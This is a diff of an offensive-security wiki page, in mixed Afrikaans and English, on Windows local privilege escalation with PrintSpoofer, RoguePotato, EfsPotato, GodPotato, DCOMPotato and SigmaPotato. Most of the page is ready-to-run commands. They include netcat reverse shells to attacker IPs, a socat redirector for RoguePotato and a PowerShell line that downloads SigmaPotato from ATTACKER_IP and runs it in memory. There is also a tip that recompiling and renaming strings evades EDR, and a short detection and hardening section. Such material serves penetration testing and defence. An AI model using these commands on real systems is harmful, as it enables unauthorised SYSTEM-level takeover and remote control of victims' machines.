Translated ['src/windows-hardening/windows-local-privilege-escalation/ro

src/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md

@@ -2,9 +2,45 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-> [!WARNING] > **JuicyPotato werk nie** op Windows Server 2019 en Windows 10 weergawe 1809 en later nie. Tog kan [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)**,** [**GodPotato**](https://github.com/BeichenDream/GodPotato)**,** [**EfsPotato**](https://github.com/zcgonvh/EfsPotato)**,** [**DCOMPotato**](https://github.com/zcgonvh/DCOMPotato)** gebruik word om **die selfde voorregte te benut en `NT AUTHORITY\SYSTEM`** vlak toegang te verkry. Hierdie [blogpos](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) gaan in diepte in op die `PrintSpoofer` hulpmiddel, wat gebruik kan word om impersonasie voorregte op Windows 10 en Server 2019 gasheer te misbruik waar JuicyPotato nie meer werk nie.
+> [!WARNING]
+> **JuicyPotato doesn't work** on Windows Server 2019 and Windows 10 build 1809 onwards. However, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)**,** [**GodPotato**](https://github.com/BeichenDream/GodPotato)**,** [**EfsPotato**](https://github.com/zcgonvh/EfsPotato)**,** [**DCOMPotato**](https://github.com/zcgonvh/DCOMPotato)** can be used to leverage the same privileges and gain `NT AUTHORITY\SYSTEM` level access. This [blog post](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) goes in-depth on the `PrintSpoofer` tool, which can be used to abuse impersonation privileges on Windows 10 and Server 2019 hosts where JuicyPotato no longer works.
 
-## Quick Demo
+> [!TIP]
+> A modern alternative frequently maintained in 2024–2025 is SigmaPotato (a fork of GodPotato) which adds in-memory/.NET reflection usage and extended OS support. See quick usage below and the repo in References.
+
+Related pages for background and manual techniques:
+
+{{#ref}}
+seimpersonate-from-high-to-system.md
+{{#endref}}
+
+{{#ref}}
+from-high-integrity-to-system-with-name-pipes.md
+{{#endref}}
+
+{{#ref}}
+privilege-escalation-abusing-tokens.md
+{{#endref}}
+
+## Requirements and common gotchas
+
+All the following techniques rely on abusing an impersonation-capable privileged service from a context holding either of these privileges:
+
+- SeImpersonatePrivilege (mees algemeen) or SeAssignPrimaryTokenPrivilege
+- High integrity is not required if the token already has SeImpersonatePrivilege (typies vir baie service-accounts soos IIS AppPool, MSSQL, etc.)
+
+Kontroleer privileges vinnig:
+```cmd
+whoami /priv | findstr /i impersonate
+```
+Operasionele aantekeninge:
+
+- PrintSpoofer benodig dat die Print Spooler-diens loop en bereikbaar is via die plaaslike RPC-endpoint (spoolss). In geharde omgewings waar Spooler na PrintNightmare gedeaktiveer is, verkies RoguePotato/GodPotato/DCOMPotato/EfsPotato.
+- RoguePotato vereis 'n OXID-resolver wat op TCP/135 bereikbaar is. As egress geblokkeer is, gebruik 'n redirector/port-forwarder (sien voorbeeld hieronder). Ouer builds het die -f flag benodig.
+- EfsPotato/SharpEfsPotato misbruik MS-EFSR; as een pipe geblokkeer is, probeer alternatiewe pipes (lsarpc, efsrpc, samr, lsass, netlogon).
+- Error 0x6d3 tydens RpcBindingSetAuthInfo dui gewoonlik op 'n onbekende/nie-ondersteunde RPC-verifikasiediens; probeer 'n ander pipe/transport of verseker dat die teikendiens loop.
+
+## Vinnige Demo
 
 ### PrintSpoofer
 ```bash
@@ -21,12 +57,24 @@ c:\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd"
 NULL
 
 ```
+Aantekeninge:
+- Jy kan -i gebruik om 'n interaktiewe proses in die huidige konsole te begin, of -c om 'n eenreëler te hardloop.
+- Vereis die Spooler service. As dit gedeaktiveer is, sal dit misluk.
+
 ### RoguePotato
 ```bash
 c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -l 9999
 # In some old versions you need to use the "-f" param
 c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -f 9999
 ```
+As uitgaande 135 geblokkeer is, pivot die OXID resolver via socat op jou redirector:
+```bash
+# On attacker redirector (must listen on TCP/135 and forward to victim:9999)
+socat tcp-listen:135,reuseaddr,fork tcp:VICTIM_IP:9999
+
+# On victim, run RoguePotato with local resolver on 9999 and -r pointing to the redirector IP
+RoguePotato.exe -r REDIRECTOR_IP -e "cmd.exe /c whoami" -l 9999
+```
 ### SharpEfsPotato
 ```bash
 > SharpEfsPotato.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "whoami | Set-Content C:\temp\w.log"
@@ -63,16 +111,51 @@ CVE-2021-36942 patch bypass (EfsRpcEncryptFileSrv method) + alternative pipes su
 
 nt authority\system
 ```
+Wenk: As een pipe misluk of EDR dit blokkeer, probeer die ander ondersteunde pipes:
+```text
+EfsPotato <cmd> [pipe]
+pipe -> lsarpc|efsrpc|samr|lsass|netlogon (default=lsarpc)
+```
 ### GodPotato
 ```bash
 > GodPotato -cmd "cmd /c whoami"
 # You can achieve a reverse shell like this.
 > GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"
 ```
+Notes:
+- Werk op Windows 8/8.1–11 en Server 2012–2022 wanneer SeImpersonatePrivilege aanwesig is.
+
 ### DCOMPotato
 
 ![image](https://github.com/user-attachments/assets/a3153095-e298-4a4b-ab23-b55513b60caa)
 
+DCOMPotato bied twee variante wat service DCOM objects teiken wat standaard op RPC_C_IMP_LEVEL_IMPERSONATE ingestel is. Bou of gebruik die verskafde binaries en voer jou bevel uit:
+```cmd
+# PrinterNotify variant
+PrinterNotifyPotato.exe "cmd /c whoami"
+
+# McpManagementService variant (Server 2022 also)
+McpManagementPotato.exe "cmd /c whoami"
+```
+### SigmaPotato (bygewerkte GodPotato fork)
+
+SigmaPotato voeg moderne geriewe by soos in-memory execution via .NET reflection en 'n PowerShell reverse shell helper.
+```powershell
+# Load and execute from memory (no disk touch)
+[System.Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData("http://ATTACKER_IP/SigmaPotato.exe"))
+[SigmaPotato]::Main("cmd /c whoami")
+
+# Or ask it to spawn a PS reverse shell
+[SigmaPotato]::Main(@("--revshell","ATTACKER_IP","4444"))
+```
+## Opsporing en verhardingsnotas
+
+- Moniteer vir prosesse wat named pipes skep en onmiddellik token-duplication APIs aanroep, gevolg deur CreateProcessAsUser/CreateProcessWithTokenW. Sysmon kan nuttige telemetrie verskaf: Event ID 1 (proses skepping), 17/18 (named pipe geskep/gekoppel), en command lines wat child processes as SYSTEM spawn.
+- Spooler-verharding: Deaktiveer die Print Spooler service op bedieners waar dit nie benodig word nie om PrintSpoofer-styl plaaslike afdwingings via spoolss te voorkom.
+- Diensrekening-verharding: Minimeer toewysing van SeImpersonatePrivilege/SeAssignPrimaryTokenPrivilege aan pasgemaakte dienste. Oorweeg om dienste onder virtuele rekeninge met die minste vereiste privileges te laat loop en hulle waar moontlik te isoleer met service SID en write-restricted tokens.
+- Netwerkbeheer: Die blokkering van uitgaande TCP/135 of die beperking van RPC endpoint mapper-verkeer kan RoguePotato breek tensy ’n interne redirector beskikbaar is.
+- EDR/AV: Al hierdie tools is wyd gesignatureer. Herkompilering vanaf bron, hernoem van symbols/strings, of gebruik van in-memory execution kan detectie verminder, maar sal soliede gedragsgebaseerde deteksie nie omseil nie.
+
 ## Verwysings
 
 - [https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/)
@@ -82,5 +165,7 @@ nt authority\system
 - [https://github.com/BeichenDream/GodPotato](https://github.com/BeichenDream/GodPotato)
 - [https://github.com/zcgonvh/EfsPotato](https://github.com/zcgonvh/EfsPotato)
 - [https://github.com/zcgonvh/DCOMPotato](https://github.com/zcgonvh/DCOMPotato)
+- [https://github.com/tylerdotrar/SigmaPotato](https://github.com/tylerdotrar/SigmaPotato)
+- [https://decoder.cloud/2020/05/11/no-more-juicypotato-old-story-welcome-roguepotato/](https://decoder.cloud/2020/05/11/no-more-juicypotato-old-story-welcome-roguepotato/)
 
 {{#include ../../banners/hacktricks-training.md}}